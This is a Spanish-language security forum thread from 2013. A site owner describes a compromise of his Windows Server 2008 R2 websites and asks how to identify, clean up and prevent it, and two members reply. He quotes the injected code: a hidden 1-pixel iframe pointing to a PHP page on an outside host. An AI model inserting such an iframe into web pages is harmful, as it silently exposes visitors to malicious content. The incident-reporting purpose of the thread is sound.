elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderadores: skapunky, r32)
| | |-+  Ataque Servidore windows R2 2008
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ataque Servidore windows R2 2008  (Leído 659 veces)
Cronck

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Ataque Servidore windows R2 2008
« en: 18 Mayo 2013, 01:28 »

Buenas tardes a todos, nuevamente me da gusto regresar a este foro.

En esta ocacion para consultar con ustedes un problema que he tenido en unos servidores, hace unos día tube un ataque a unos sitios que tengo en estos servidores, todos los nombres de los archivos están iguales, pero el contenido era distinto.

Dentro de ello habian 2 lineas similares a estas:

Código:
<iframe width="1px" height="1px" src="http://ishigo.sytes.ne
t/openstat/appropriate/promise-ourselves.php" style="display
:block;" >

Restaure toda la informacion y 2 dias despues google me bloqueo el sitio por tener contenido malicioso, al revisar el index, footer y header del sitio en las ultimas lineas contenía el código anterior.

Actualmente estoy cambiando los sitios a otros servidores, para desechar estos con lo que tengo problemas.

Pero me surgen las siguientes dudas.

1.- Que tipo de ataque a sido este?
2.- Como saber si realmente la información esta limpia al pasarla al otro servidor y poder salir de la lista negra de google
3.- Como prevenir estos acontecimientos.

Realmente me sentí muy vulnerable, yo he usado linux mas de 10 años hacia atrás, y es mi primera ves que uso windows por requerimiento de estos sitios y no pude encontrar la solución del error.

Saludos y gracias por sus comentarios


En línea

HRHDP

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Ataque Servidore windows R2 2008
« Respuesta #1 en: 18 Mayo 2013, 10:41 »

Hola estas usando db en su sitio??
Puede que te Allan hecho un inyección Sql es lo único que se me ocurre.
Si ese código te lo insertaron en tu web.


En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 18.521


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Ataque Servidore windows R2 2008
« Respuesta #2 en: 18 Mayo 2013, 11:06 »

Revisa si tienes el sistema actualizado.

Es muy habitual que añaden un 1 frame de 1px con código malicioso, lo que tienes que averiguar ahora es dónde está la vulnerabilidad.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Servidore cs1.6
Juegos y Consolas
k4m1 1 395 Último mensaje 19 Septiembre 2005, 23:43
por Mance
Windows Vista y Windows Server 2008: SP2 Beta disponible
Noticias
wolfbcn 0 415 Último mensaje 6 Diciembre 2008, 18:57
por wolfbcn
windows server 2008 se transforma en windows vista
Windows
Vjuan_ 5 2,162 Último mensaje 26 Febrero 2010, 17:04
por Vjuan_
activador de windows 2008
Windows
elzar 0 270 Último mensaje 30 Noviembre 2012, 18:49
por elzar
Help Windows Server 2008
Windows
Chamaness 0 281 Último mensaje 15 Febrero 2013, 23:48
por Chamaness
Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines